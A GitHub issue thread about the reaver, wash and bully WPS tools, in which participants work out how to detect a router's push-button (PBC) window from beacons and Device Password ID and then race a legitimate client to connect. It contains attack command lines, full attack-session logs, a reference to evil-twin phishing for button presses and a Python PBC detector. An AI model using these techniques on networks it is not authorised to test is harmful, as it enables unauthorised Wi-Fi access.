Open minanagehsalalma opened 2 years ago
there's currently no code in wash or similar tools to know whether the button was pushed. you just got to be lucky and have a packet capture running while someone submits M1-M7 with the AP, so you can extract all parameters needed for https://camo.githubusercontent.com/18d30ce7809015bae46a7b5e10957e762e269e01a26ab7b8f7accb146520c1f8/68747470733a2f2f692e696d6775722e636f6d2f71565138526e672e706e67 from wireshark.
@rofl0r Oh! Thanks a lot
So I need to sniff using airodump, wait for someone to press the button and connect, and use the values exchanged between them and the router to get the password?
But how do I actually extract these values from a Wireshark capture?
Also, this isn't what I meant.
I need to detect whether the button was pushed or not without me or someone else trying to connect to it,
so I can act on it: if I notice the button was pushed then I can choose to connect to it or not.
I read here at the wifiphisher wpspbc extension that you can detect if a button was pushed or not without needing someone to connect to it, by just sniffing a WPSPBC IE.... But I wasn't able to understand how,
or if it's possible to do it manually.
Thanks again for your response; it really helps, as I found no mention of the matter online.
So i need to sniff using airodump and wait for some one to press the button and connect ? and use the values exchanged between them and the router
yes, or using wireshark, or tcpdump or any other tool that can capture packets from a monitor interface
But how do i actually extract these values from a wireshark capture ?
expand the headers of M1-M7 and look for the relevant fields
I need to detect whether the button was pushed or not
you're the first person needing it so far, so nobody has implemented it. PR adding it to wash is welcome.
expand the headers of M1-M7 and look for the relevant fields
@rofl0r what filter do i use to find the m1-m7 headers ?
what about this
I need to detect whether the button was pushed or not without me or some one try to connect to it
so i can act on it if i notice the button was pushed then i can choose to connect to it or not
I read Here at wifiphisher wpspbc extension That you can detect if a button was pushed or not without needing for someone to connect to it , by just sniffing A WPSPBC IE .... But i wasn't able to understand how
is it possible or not ?
you're the first person needing it so far
Not really; as I mentioned above, wifiphisher needed it and so does "hostbase".
They use an evil twin attack and ask the user to push the button instead of a password.... but they have to stop the deauth of the target clients so they are able to check if the button was pushed or not, as they weren't able to figure out a way to check by just monitoring.
Googling the problem I found a lot of people asking about it but not able to figure it out.
And here too they had to use an alternative method because they weren't able to figure out how:
https://www.wifi-libre.com/topic-596-vulnerabilidad-wps-pbc-push-button.html
I just want to figure out how to do it using airodump-ng without any one trying to connect
thanks
@rofl0r what filter do i use to find the m1-m7 headers ?
can't recall from the top of my head. just record a WPS session (even if wrong pin) to your router and look at the packets. wireshark somewhere mentions those are iirc EAP packets and also has the info whether M1, etc somewhere listed.
is it possible or not ?
i don't know. you best experiment with your own router and compare packets before you push the button and after. in other words, i can't help you further, you gotta dig into this yourself.
@rofl0r oh thanks a lot you helped me a lot so far
I was able to find it. I made two captures, one without the WPS PBC button pressed and one with the button pressed; I let it sniff for the whole 2-minute duration of the PBC connection window.
Then I tried all the WPS PBC filters from the Wireshark wiki,
and only two filters showed no results on the non-PBC capture
while showing a lot of results on the one with PBC pressed.
The three filters are:
wps.selected_registrar_config_methods.phy_pushbutton
wps.selected_registrar_config_methods.pushbutton
wps.selected_registrar_config_methods
and this one i found by looking at the packets
wps.device_password_id
Now that we know which filters are needed,
I still don't know how to do it from the terminal using tcpdump.
I am trying to do something like this, but I can't figure out the syntax for using tcpdump and checking whether the matches are zero or not just from bash:
HEREAGAIN
If tcpdump wps.selected_registrar_config_methods != 0
then echo "The button has been pushed"
break;
else
sleep 10
goto HEREAGAIN
I linked the Two capture files if that would help
Thanks a lot
there's currently no code in wash or similar tools to know whether the button was pushed.
@rofl0r I think that I have found a tool,
but it works on older systems with Python 2.7 only: wps2key.py
Looks like scapy was the key all along haha
a thing that comes to mind is the json mode of wash (wash -j). it also lists stuff like that.
@rofl0r oh thanks a lot, you are right.
But it misses wps.device_password_id
and Selected Registrar config methods,
even though wps2key.py is able to see them. And it's a bit slower, but no problem.
I am trying to do a check using this syntax
wash -i wlan0 -j -b XX:73:8F:XD:XX -c 8 | grep -zqv "wps_selected_registrar" && echo no || echo yes
But it only prints Yes after I kill it using Ctrl+C 😥
anyway thanks a lot you helped me a lot so far
PR adding it to wash is welcome.
Yeah, just add another column "WPS PBC" with the text "Not pushed" / "pushed" in front of each AP in case of a "wps_selected_registrar" match, but that should be turned on only if an argument like --PBC or something is used, as it slows the scan; and as a bonus you can add an option to make it auto-connect when a match is found.
Does the WPS lock matter when using PBC? My network has the lock status as true but I found no problem connecting using PBC, though. Is that the case with all APs?
But for some reason Reaver -K -L fails. Even using the -N option doesn't help. This error occurs on the router:
WPS: A new PIN configured (timeout=0)
WPS: UUID - hexdump(len=16): [NULL]
WPS: PIN - hexdump_ascii(len=8):
31 32 33 34 35 36 37 30 12345670
WPS: Selected registrar information changed
WPS: Internal Registrar selected (pbc=0)
WPS: sel_reg_union
WPS: set_ie
WPS: cb_set_sel_reg
WPS: Enter wps_cg_set_sel_reg
WPS: Leave wps_cg_set_sel_reg early
WPS: return from wps_selected_registrar_changed
[+] Trying pin "12345670"
send_packet called from deauthenticate() 80211.c:380
send_packet called from authenticate() 80211.c:411
[+] Sending authentication request
send_packet called from associate() 80211.c:464
[+] Sending association request
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[+] Sending EAPOL START request
send_packet called from send_eapol_start() send.c:48
[+] Received identity request
[+] Sending identity response
send_packet called from send_identity_response() send.c:81
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=396 op_code=4)
WPS: Received WSC_MSG
WPS: Unsupported attribute type 0x1049 len=6
WPS: Parsed WSC_MSG
WPS: Received M1
WPS: UUID-E - hexdump(len=16): bc 32 9e 00 1d d8 11 b2 86 01 ec 3e b3 40 7b 22
WPS: Enrollee MAC Address ec:3e:b3:40:7b:21
WPS: Enrollee Nonce - hexdump(len=16): ae fa d8 dd cd 3b 40 58 f9 98 34 4b a5 ec 3f c9
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
WPS: Enrollee Connection Type flags 0x1
WPS: Enrollee Config Methods 0x238c [Label] [Display] [PBC] [Keypad]
WPS: Enrollee Wi-Fi Protected Setup State 2
WPS: Manufacturer - hexdump_ascii(len=5):
5a 79 78 65 6c XXXXX
WPS: Model Name - hexdump_ascii(len=12):
56 4d 47 33 36 32 35 2d 54 35 30 42 XXXX-XXXX
WPS: Model Number - hexdump_ascii(len=6):
52 54 32 38 36 30 XXXXX
WPS: Serial Number - hexdump_ascii(len=4):
31 32 33 34 1234
WPS: Primary Device Type: 6-0050F204-1
WPS: Device Name - hexdump_ascii(len=12):
56 4d 47 33 36 32 35 2d 54 35 30 42 XXXXX-XXXX
WPS: Enrollee RF Bands 0x1
WPS: Enrollee Association State 0
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4
WPS: WPS_CONTINUE, Freeing Last Message
WPS: WPS_CONTINUE, Saving Last Message
WPS: returning
[+] Received M1 message
WPS: Found a wildcard PIN. Assigned it for this UUID-E
WPS: Registrar Nonce - hexdump(len=16): 96 72 d5 07 90 3b bf 16 7d b1 1e d5 5a 2f 95 78
WPS: UUID-R - hexdump(len=16): 1a f0 6e 79 80 f3 c4 95 bc 93 14 ee 2b 27 89 9b
WPS: Building Message M2
WPS: * Version
WPS: * Message Type (5)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * UUID-R
WPS: * Public Key
WPS: Generate new DH keys
WPS: DHKey - hexdump(len=32): ff 23 d1 1f 1f 0c be 3c 41 4f dc 00 f5 e5 70 32 a2 c0 3e c3 d0 2b 77 22 6b 3d ca 3c d3 0e db 99
WPS: KDK - hexdump(len=32): be 3e 80 5c db 6f 80 68 bf 26 bb d9 89 f5 5e e4 3b ac f0 41 58 7a 09 3f 82 21 84 1f a5 75 28 fa
WPS: AuthKey - hexdump(len=32): 37 ae c3 76 92 46 df 3f 84 fe 71 32 c2 cd e5 a5 ea 21 63 ed c6 a4 06 b8 40 54 cc 47 ca 94 6a be
WPS: KeyWrapKey - hexdump(len=16): 71 56 a6 35 29 8f ac fa a5 10 d4 31 a2 e6 7a 2e
WPS: EMSK - hexdump(len=32): fc 1f da 04 ae 73 88 90 29 5f c4 1a 59 13 ed a5 b4 48 aa 27 11 a2 de 7e 0d 2d 47 d9 ef fd 2c 7b
WPS: * Authentication Type Flags
WPS: * Encryption Type Flags
WPS: * Connection Type Flags
WPS: * Config Methods (8c)
WPS: * Manufacturer
WPS: * Model Name
WPS: * Model Number
WPS: * Serial Number
WPS: * Primary Device Type
WPS: * Device Name
WPS: * RF Bands (0)
WPS: * Association State
WPS: * Configuration Error (0)
WPS: * Device Password ID (4)
WPS: * OS Version
WPS: * Authenticator
[+] Sending M2 message
send_packet called from send_msg() send.c:116
send_packet called from resend_last_packet() send.c:161
WPS: Processing received message (len=66 op_code=3)
WPS: Received WSC_NACK
WPS: Unsupported attribute type 0x1049 len=6
WPS: Enrollee terminated negotiation with Configuration Error 15
[+] Received WSC NACK
WPS: Building Message WSC_NACK
WPS: * Version
WPS: * Message Type (14)
WPS: * Enrollee Nonce
WPS: * Registrar Nonce
WPS: * Configuration Error (0)
[+] Sending WSC NACK
send_packet called from send_msg() send.c:116
[!] WPS transaction failed (code: 0x04), re-trying last pin
Even though using Pixie Dust on Router Scan succeeds with no problem in the same situation! What's the problem??
[*] Associating with AP...
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[*] Warning: AP is locked.
[*] Waiting for pin "00000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Start.
[*] Sending WPS Message M1...
[*] PKE: 8AD2042450A59BA8BC7FA54E8B744D4407F4D1CCC7608B8BBCB6D43FF1302540FEAABA1EE3BFB9448D790047817003066623861D5XXXXXXXXXXXXXXXXX179ED4BCBEC8497F1352F8195C54FF52008560EB924CFBBA00644651AEC7D987939B736ECF0AAAB9D46165A874FF995956B925B9F14507831B969C88C8D8455423851239774465ABE338407FDBC75E900FABA50AF544C02224A34C3A1BFA5BE36733656535F08D5310EE4ECC56F570B49EB26681E88ECC48251225DB
[*] Received WPS Message M2.
[*] R-Nonce: 65F27C09AEBXXXXXXXXXX1F98FD9
[*] PKR: FFD666E8F35F7FCD889998CC22FBF2C1C76ACCF0773CA7D8974AC11A5237629512B62780633391C7333C034AA5CC60B79B26E7C8E63DF6CXXXXXXXXXXXXXXXXXXXXXXXXXXE68551F309B2A6527A9FF160AD241F08640D9522B5DC4C91AAB61B26E0087F24B7B7C46BEE2C220F0DF985774F08C17F4A1741E24E0FF7DC8AE2FD9033BF733702D3FCC4F081B6BA48093D7A3070D08EA115115EB879782445A80E4B8822657318DA00357262C33FC3D1D4D8CC022450CDA187BC4819F412A67
[*] Manufacturer: XXXX
[*] Model Name: XXXXX
[*] Model Number: XXXX
[*] Serial Number: XXX
[*] Device Name: XXXXXX
[*] AuthKey: DF8FD6BF19BA5C060D7EBCDXXXXXXF1888F8564D1BF0F2226D6EC1A7F0
[*] Sending WPS Message M3...
[*] Received WPS Message M4.
[*] R-Hash1: DDF3FC51F7398E513CEE0XXXXXXXXA52E6234995F3FDFA
[*] R-Hash2: 6E3CA58ECC37CB199C2A799XXXXXA5EF10EC231CAC76D75D1DDD2A5145C4F2
[*] R-S1: 04A9C4BABD12E060XXXX56089F57CC
[*] Sending WPS Message M5...
[*] Received WPS Message M6.
[*] R-S2: 820C0D464FC46D551C9FXXXx51115
[*] Sending WPS Message M7...
[*] Received WPS Message M8.
[*] Sending WSC DONE...
[*] EAP session closed.
[+] WPS transaction succeeded!
[+] SSID: XXXXXXXXX
[+] Key: XXXXXXXXXXXX
[+] Key Index: 1
This is the Router Scan configuration.
Even when disabling PixieDust it still works!
[*] Audit started at 2022.01.23 23:00:45 (UTC+02:00).
[*] Associating with AP...
[+] Associated with EX:3X:B3:X0:7B:21 (ESSID: ~XXXXXXX~).
[*] Warning: AP is locked.
[*] Waiting for pin "000000"...
[*] Sending EAPOL Start...
[*] Received Identity Request.
[*] Sending Identity Response...
[*] Received WPS Start.
[*] Sending WPS Message M1...
[*] Received WPS Message M2.
[*] Manufacturer: XXXX
[*] Model Name: XXXXX
[*] Model Number: XXXX
[*] Serial Number: XXX
[*] Device Name: XXXXXX
[*] Sending WPS Message M3...
[*] Received WPS Message M4.
[*] Sending WPS Message M5...
[*] Received WPS Message M6.
[*] Warning: R-Hash2 security check failed.
[*] The AP sent wrong 2nd pin part.
[*] Sending WPS Message M7...
[*] Received WPS Message M8.
[*] Sending WSC DONE...
[*] EAP session closed.
[+] WPS transaction succeeded!
[+] SSID: XXXXXXXXX
[+] Key: XXXXXXXXXXXX
[+] Key Index: 1
[*] Audit stopped at 2022.01.23 23:00:58 (UTC+02:00).
Second: why doesn't wash refresh its results? I mean it only outputs each network's status once per run and needs to exit and then start again for a status refresh, and using the -s scan mode doesn't make any difference! So...
What's the problem??
i don't know, maybe @binarymaster can shed some light on this difference.
Second : Why Wash doesn't refresh results ?
because wash isn't a tool for real-time monitoring, but for one-shot information gathering. in order to work as you want, you'd need to start it in a way it's automatically terminated after e.g. one sec (like sending a SIGALRM to it, iirc there's some shell tool to achieve that), and only using the channel of the target ap.
and only using the channel of the target ap.
@rofl0r hmm what do you mean ?
there's some shell tool to achieve that
What's its name?
i don't know, maybe @binarymaster can shed some light on this difference.
Yeah, because I even tried bully and it still fails:
bully wlan0mon -c 3 -b XX:3E:XX:40:XX:21 -v 4 -p 1234567 --lockignore
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[+] Switching interface 'wlan0mon' to channel '3'
[!] Starting pin specified, defaulting to sequential mode
[!] Using 'XX:XX:XX:21:XX:bb' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'XX:3E:XX:40:XX:21' on channel '3'
[+] Got beacon for 'XXXXXXXXXXXXXX' (XX:3E:XX:40:XX:21)
[!] Beacon information element indicates WPS is locked
[+] Index of starting pin number is '1234567'
[+] Last State = 'NoAssoc' Next pin '12345670'
[+] Rx( ID ) = 'Timeout' Next pin '12345670'
[+] Rx( ID ) = 'Timeout' Next pin '12345670'
Does the wps lock matter when using the PBC ?
I think not, since you are explicitly pressing a physical (or virtual) button. Some routers may clean lock flag on button press, some may not.
i don't know, maybe @binarymaster can shed some light on this difference.
I'm actually tracking this thread from the beginning :smile: Would be nice to have a passive way of WPS button press detection when scanning networks (preferably using Probe Response data) so I can integrate this into Router Scan.
i don't know, maybe @binarymaster can shed some light on this difference.
I'm actually tracking this thread from the beginning 😄
i suspect the problem lies here in reaver code/output:
WPS: Enrollee MAC Address ec:3e:b3:40:7b:21
WPS: Enrollee Nonce - hexdump(len=16): ae fa d8 dd cd 3b 40 58 f9 98 34 4b a5 ec 3f c9
WPS: Enrollee Authentication Type flags 0x21
WPS: No match in supported authentication types (own 0x0 Enrollee 0x21)
WPS: Workaround - assume Enrollee does not advertise supported authentication types correctly
WPS: Enrollee Encryption Type flags 0x9
WPS: No match in supported encryption types (own 0x0 Enrollee 0x9)
WPS: Workaround - assume Enrollee does not advertise supported encryption types correctly
...
WPS: Device Password ID 4
WPS: Enrollee Configuration Error 0
WPS: OS Version 80000000
WPS: M1 Processed
WPS: Unsupported Device Password ID 4
what does routerscan do differently here than reaver?
there's some shell tool to achieve that
What's its name?
if i would recall i'd already told you. google "shell terminate command after 1 sec"
and only using the channel of the target ap.
@rofl0r hmm what do you mean ?
the idea is that you run wash in a loop targeting only the channel the device uses so no time is wasted scanning different channels, and as soon as you have the magic string in the json output you know that now's the time to start sniffing packets for the WPS interchange.
what does routerscan do differently here than reaver?
I think Router Scan just ignores what the AP sends in the "Device Password ID" field.
However when it's configured to Enrollee mode, it sends M1 message first, and the "Device Password ID" is equal either to 0 (PIN mode) or 4 (PBC mode) - depending on what setting is chosen in the GUI.
i currently don't have a router with wps button available to test this. maybe @feitoi is interested to look into what's going wrong here ?
you're the first person needing it so far, so nobody has implemented it.
😏😏
I'm actually tracking this thread from the beginning 😄 Would be nice to have a passive way of WPS button press detection when scanning networks (preferably using Probe Response data) so I can integrate this into Router Scan.
@rofl0r Haha see ?
@binarymaster You can use the waircut method , it's on windows too
Directed against any AP in the radius of action. It scans all the APs until it detects one that has started the push-button protocol and tries to connect to it before the legitimate client does. You will see that while it is scanning, the list of Aps is continually updating, both the signal level of each one and the number of them, it is like having a continuous scan, so to speak.
Source : Liberada la versión 1.9
I think not, since you are explicitly pressing a physical (or virtual) button. Some routers may clean lock flag on button press, some may not.
oh
if i would recall i'd already told you. google "shell terminate command after 1 sec"
Thanks i was able to do it using the timeout function
Even though I want to get it to loop if not found, this will work:
timeout 10s wash -i wlan0mon -j -b XX:XX:XX:XX:XX:XX -c 8 | grep -zqv "wps_selected_registrar" && echo no || echo yes
and as soon as you have the magic string in the json output you know that now's the time to start sniffing packets for the WPS interchange.
Hmm, or you can connect using wpa_cli wps_pbc. But if you'd like to go the sniffing route, then why not just run airodump on the wanted channel all the time?
I think Router Scan just ignores what the AP sends in the "Device Password ID" field.
So.... when the
Device Password ID is equal to
4 (PBC mode)
It still continues to use the same method it was set to use? How is it possible that the PIN method is able to work on Router Scan when the Device Password ID is 4, which means PBC only? That doesn't make any sense.
I also noticed that even when the WPS method is set to PUSH BUTTON as enrollee, it still asks for a PIN!
That doesn't seem right to me!
Thanks
Hello everybody!
In my modified version of wash, I set it to monitor wps_selected_registrar, and my analysis is:
"wps_selected_registrar" : 01
does not mean all routers are in PBC mode; some routers also have "wps_selected_registrar" : 01
in PIN mode, and of these routers 95% or more are vulnerable to the Pixie Dust attack. I also believe these routers disable/vanish the WPS function if it doesn't end with WSC_NACK, but this issue has already been solved in reaver.
I think not, since you are explicitly pressing a physical (or virtual) button. Some routers may clean lock flag on button press, some may not.
I confirm, @binarymaster
But for some reason Reaver -K -L fails. Even using the -N option doesn't help. What's the problem??
When the WPS button is pushed, the AP temporarily changes the PIN to 00000000 and changes the lock flag to unlocked or not; if the AP is not vulnerable to the Pixie Dust attack then reaver will not work. Better to add -p 00000000 and, when it asks, don't restore the previous session.
Does the wps lock matter when using the PBC?
It matters to reaver; reaver needs WPS unlocked. Update reaver and I believe you will see the NACK code is 0x000F, see my comment.
Hello everybody!
Hello @feitoi
In my a modified version of wash, I put to monitor
wps_selected_registrar
, and my analysis is:"wps_selected_registrar" : 01
does not mean all routers are in PBC mode, some routers also have"wps_selected_registrar" : 01
in PIN mode
Hmmm, interesting. So how do we actually use wash to detect if the WPS button was pushed or not?
I would have used wps.device_password_id == 0x0004
but wash doesn't show that in the Json mode
Also does the same thing happen for this filter too ?
wps.selected_registrar_config_methods.pushbutton
and change lock flag to unlocked or not
Nah, the lock doesn't get cleared for me when I push the button. Idk if it gets cleared during the 120 seconds and not after, or not... but it's currently still locked after pressing it like a dozen times.
Better to add -p 00000000 and it responds don't restore previous session.
So.... That way Reaver would work with PBC ?
Matter to reaver, reaver needs WPS unlocked
But why , When it doesn't matter if the WPS button is pushed , the lock doesn't matter as you said.
In my a modified version of wash, I put to monitor
wps_selected_registrar
, and my analysis is:"wps_selected_registrar" : 01
does not mean all routers are in PBC mode, some routers also have"wps_selected_registrar" : 01
in PIN mode
Dang it , That means I answered my question wrong on unix.stackexchange 😥
@minanagehsalalma
I was able to find it i captured Two captures
it seems google drive wants me to login, so i cant download. can you upload it to 0x0.st instead ?
why this weird site
@rofl0r
Here it's WPS PBC.zip
I see that @drygdryg added a --push-button-connect : Run WPS push button connection
option
Can you tell Us how you added the
Also , Can it take a channel and bssid as an argument ?
Update reaver and I believe you will see nack code is 0x000F see my comment
@feitoi Yeah, just tested it, and it works great.
But Then what does the
-L, --ignore-locks Ignore locked state reported by the target AP
Actually do currently ?
oh never mind 😅
I have checked the Wi-Fi Protected Setup Specification and it's quite an interesting read; it has all the answers... so about the AP setup locked:
Reaver doesn't have to exit when it detects the setup is locked, but maybe if it also detects the device password ID set to PBC then it should try PBC too.
Anyway, this is what caught my eye from the documentation:
The AP informs Enrollees that the Selected Registrar is in PBC mode using Probe Response messages
The Enrollee performs this scan by sending out probe requests with a Device Password ID indicating that the Enrollee is in PBC mode and receiving probe responses indicating a Selected Registrar with a PBC Device Password ID.
When an AP receives a Selected Registrar and Device Password ID indicating PBC mode from a Registrar, it MUST automatically remove this information and no longer include it in probe responses after an interval of Walk Time has elapsed.
Before the Registrar’s button is pushed, the AP shall not advertise any active PBC state
Device Password ID : Indicate the method or identifies the specific password that the selected Registrar intends to use. AP in PBC mode must indicate 0x0004 within two-minute Walk Time.
When in PBC mode, the Registrar shall respond to PBC M1 messages with UUID-E values matching the UUID-E from the PBC probe request message. The Registrar’s response is an M2 message denoting via the DevicePassword ID attribute that it is in the active PBC state. Upon receiving the M2 message, the Enrollee engages that Registrar with messages M3-M8, with both the Registrar and Enrollee using a value of ‘00000000’ for the PBC Device Password (PIN).
Found it, found where you got this from:
When WPS button was pushed, the AP temporarily change the PIN to 00000000 and change lock flag to unlocked or not, if AP is not vulnerable to Pixie Dust attack then reaver will not work
Anyway, which leads us to the conclusion that this:
is: "wps_selected_registrar" : 01 does not mean all routers are in PBC mode, some routers also have "wps_selected_registrar" : 01 in PIN mode, and these routers
shouldn't happen, and I also found this in another WPS document titled Wireless LAN PCI Card User Manual V1.1:
Device Password ID : Indicate the method or identifies the specific password that the selected Registrar intends to use. AP in PBC mode must indicate 0x0004 within two-minute Walk Time.
Which means that the only way to actually make sure that the button was pushed is to check the Device Password ID value.
Images from the first documentation
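An added example (not code from this thread, reaver or wash) implementing the check the spec excerpts above describe: it pulls the WPS vendor IE out of a beacon's or probe response's tagged parameters, reads Selected Registrar, Device Password ID and Selected Registrar Config Methods, treats PBC as active only when Device Password ID is 0x0004 (so a Selected Registrar flag alone, the PIN-mode case feitoi noted, is not mistaken for a button press), and tracks per-BSSID transitions against the two-minute Walk Time. The frames are constructed inline rather than captured, the attribute IDs are from the WSC spec, and a single unfragmented WPS IE per frame is assumed.

```python
import struct
from dataclasses import dataclass
from typing import Dict, Optional

WPS_OUI_TYPE = b"\x00\x50\xf2\x04"  # vendor IE (tag 0xDD) body prefix: Microsoft OUI + WPS type
# WSC attribute IDs (Wi-Fi Simple Configuration spec)
ATTR_VERSION = 0x104A
ATTR_WPS_STATE = 0x1044
ATTR_SELECTED_REGISTRAR = 0x1041
ATTR_DEVICE_PASSWORD_ID = 0x1012
ATTR_SEL_REG_CONFIG_METHODS = 0x1053
ATTR_AP_SETUP_LOCKED = 0x1057
DPID_PBC = 0x0004       # Device Password ID "PushButton"
CM_PUSHBUTTON = 0x0080  # Config Methods bit for push-button (0x0480 = physical push-button)
WALK_TIME_S = 120       # spec: the AP must drop the PBC advertisement after Walk Time

def parse_wps_attrs(payload: bytes) -> Dict[int, bytes]:
    """Split a WPS IE body into {attribute id: value}; each TLV is big-endian type, length, value."""
    attrs: Dict[int, bytes] = {}
    off = 0
    while off + 4 <= len(payload):
        atype, alen = struct.unpack_from(">HH", payload, off)
        off += 4
        if off + alen > len(payload):
            raise ValueError(f"truncated WPS attribute 0x{atype:04x}")
        attrs[atype] = payload[off:off + alen]
        off += alen
    return attrs

def find_wps_ie(tagged_params: bytes) -> Optional[bytes]:
    """Walk the 802.11 tagged parameters (tag, len, body) and return the WPS IE body after OUI/type."""
    off = 0
    while off + 2 <= len(tagged_params):
        tag, tlen = tagged_params[off], tagged_params[off + 1]
        body = tagged_params[off + 2:off + 2 + tlen]
        if len(body) != tlen:
            raise ValueError("truncated information element")
        if tag == 0xDD and body.startswith(WPS_OUI_TYPE):
            return body[len(WPS_OUI_TYPE):]
        off += 2 + tlen
    return None

@dataclass
class WpsAdvert:
    selected_registrar: bool
    device_password_id: int
    sel_reg_config_methods: int
    ap_setup_locked: bool

    @property
    def pbc_active(self) -> bool:
        # The spec's signal for an open button window: Selected Registrar set AND
        # Device Password ID == 0x0004. Selected Registrar alone also shows up in PIN mode.
        return self.selected_registrar and self.device_password_id == DPID_PBC

def decode_wps_advert(tagged_params: bytes) -> Optional[WpsAdvert]:
    """Decode the WPS advertisement of a beacon/probe response; None if there is no WPS IE."""
    body = find_wps_ie(tagged_params)
    if body is None:
        return None
    a = parse_wps_attrs(body)
    u8 = lambda t: a[t][0] if t in a else 0
    u16 = lambda t: struct.unpack(">H", a[t])[0] if t in a else 0
    return WpsAdvert(u8(ATTR_SELECTED_REGISTRAR) == 1, u16(ATTR_DEVICE_PASSWORD_ID),
                     u16(ATTR_SEL_REG_CONFIG_METHODS), u8(ATTR_AP_SETUP_LOCKED) == 1)

class PbcWatcher:
    """Track per-BSSID PBC state across successive frames and report transitions."""
    def __init__(self) -> None:
        self._since: Dict[str, float] = {}  # bssid -> time PBC was first seen advertised

    def observe(self, bssid: str, advert: Optional[WpsAdvert], now: float) -> Optional[str]:
        active = advert is not None and advert.pbc_active
        started = self._since.get(bssid)
        if active and started is None:
            self._since[bssid] = now
            return "pbc-advertised"  # button window just opened
        if active and now - started > WALK_TIME_S:
            return "pbc-overrun"     # still advertised past Walk Time: worth flagging
        if not active and started is not None:
            del self._since[bssid]
            return "pbc-withdrawn"   # AP removed the PBC advertisement
        return None

# --- constructed sample frames (tagged-parameter section only; not real captures) ---
def _ie(tag: int, body: bytes) -> bytes:
    return bytes([tag, len(body)]) + body

def _beacon(wps_attrs) -> bytes:
    common = [(ATTR_VERSION, b"\x10"), (ATTR_WPS_STATE, b"\x02"), (ATTR_AP_SETUP_LOCKED, b"\x01")]
    tlv = b"".join(struct.pack(">HH", t, len(v)) + v for t, v in common + list(wps_attrs))
    return _ie(0x00, b"lab-ap") + _ie(0xDD, WPS_OUI_TYPE + tlv)

BEACON_IDLE = _beacon([])
# Selected Registrar set but Device Password ID 0 (default PIN): not a button press
BEACON_PIN_SELREG = _beacon([(ATTR_SELECTED_REGISTRAR, b"\x01"), (ATTR_DEVICE_PASSWORD_ID, b"\x00\x00")])
# Button pressed: Device Password ID 0x0004 plus physical push-button method; AP still reports locked
BEACON_PBC = _beacon([(ATTR_SELECTED_REGISTRAR, b"\x01"), (ATTR_DEVICE_PASSWORD_ID, b"\x00\x04"),
                      (ATTR_SEL_REG_CONFIG_METHODS, b"\x04\x80")])
```

Feed each captured beacon or probe response (its tagged-parameter bytes) through decode_wps_advert and then PbcWatcher.observe with the frame's BSSID and timestamp; the "pbc-advertised" event is the moment the button window opened, and "pbc-overrun" marks an AP still advertising past Walk Time.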
I have just tested the OneShot PBC option; it works great, but it ignores the entered MAC address and doesn't allow specifying a channel.
meanwhile i added a couple commits that make wash add the fields the wpspy script showed, but wash not. additionally, -j mode now detects when the WPS configuration of an already printed AP changes, and prints another line (that should make it possible to remove the timeout hack to use wash to detect when button was used).
edit: what's still missing is that reaver detects when the libwps_data struct contains the device_password_id == 4 condition (push button pressed) and in that case uses pin 00000000.
meanwhile i added a couple commits that make wash add the fields the wpspy script showed, but wash not.
@rofl0r Just tested it, works just great! I updated the answer on unix.stackexchange too
additionally, -j mode now detects when the WPS configuration of an already printed AP changes, and prints another line (that should make it possible to remove the timeout hack to use wash to detect when button was used).
Ohhh, tested it. This is really awesome
But i still can't get it to echo found unless i kill it if i don't use the timeout command
wash -i wlan0mon -j -b XX:XX:B3:XX:7B:XX -c 3 | grep -q "wps_device_password_id" && echo Found || echo NotFound
only prints Found/NotFound if i kill it.
edit: what's still missing is that reaver detects when the libwps_data struct contains the device_password_id == 4 condition (push button pressed) and in that case uses pin 00000000.
There is one tiny problem in this, and it's that even though WPS PBC still works just fine with the WPS status set to locked, Reaver won't work in that case .... and that would be misleading ... as for why would it check for the lock when it doesn't matter nor is it needed in the WPS PBC case?
Great work mate
But i still can't get it to echo found unless i kill it if i don't use the timeout command
you'd need to start wash via some wrapper (e.g. a python script) that terminates the wash process as soon as the desired string is found in the output.
Even that WPS PBC Still works just fine with the WPS status set to locked, Reaver won't work in that case ....
i'd assume the reaver option -L, --ignore-locks Ignore locked state reported by the target AP
should make it possible even in that case.
Why would it check for the lock when it doesn't matter nor it's needed in WPS PBC case ?
as i said in the beginning, nobody investigated PBC use case for reaver so far, as the likelihood of somebody pushing the button while you're scanning or running a bruteforce on it seems like winning the lottery.
edit: btw, it's odd that your pcap with pbc on has only a single beacon in it. it would be interesting to see whether beacons after PBC is activated have different content (like including the WPS tags)
i'd assume the reaver option
-L, --ignore-locks Ignore locked state reported by the target AP
should make it possible even in that case.
@rofl0r But i have already tested it earlier with the -L while the button is pushed and status is locked and it still didn't work
But then what does the
-L, --ignore-locks Ignore locked state reported by the target AP
actually do currently? oh never mind 😅
you'd need to start wash via some wrapper (e.g. a python script) that terminates the wash process as soon as the desired string is found in the output.
For some reason i still can't figure it out haha, echo not found shouldn't even be an option
edit: btw, it's odd that your pcap with pbc on has only a single beacon in it. it would be interesting to see whether beacons after PBC is activated have different content (like including the WPS tags)
I don't understand ... I have posted a lot of images comparing the output of different tools PBC off vs PBC on
additionally, -j mode now detects when the WPS configuration of an already printed AP changes, and prints another line
It doesn't get affected by the "rssi", right?
But i have already tested it earlier with the -L while the button is pushed and status is locked and it still didn't work
as i said in the beginning, nobody investigated PBC use case for reaver so far
As @rofl0r says, reaver doesn't have a PBC implementation yet and because of that, the AP must have the lock flag unlocked.
edit: what's still missing is that reaver detects when the libwps_data struct contains the device_password_id == 4 condition (push button pressed) and in that case uses pin 00000000.
@minanagehsalalma, when WPS button was pushed, you should use -p 00000000
to get the password and not with -p 12345670
reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 3 -vvLN -p 00000000
I don't understand ... I have posted a lot of images comparing the output of different tools PBC off vs PBC on
I think you missed to do WPS authentication while capturing with wireshark.
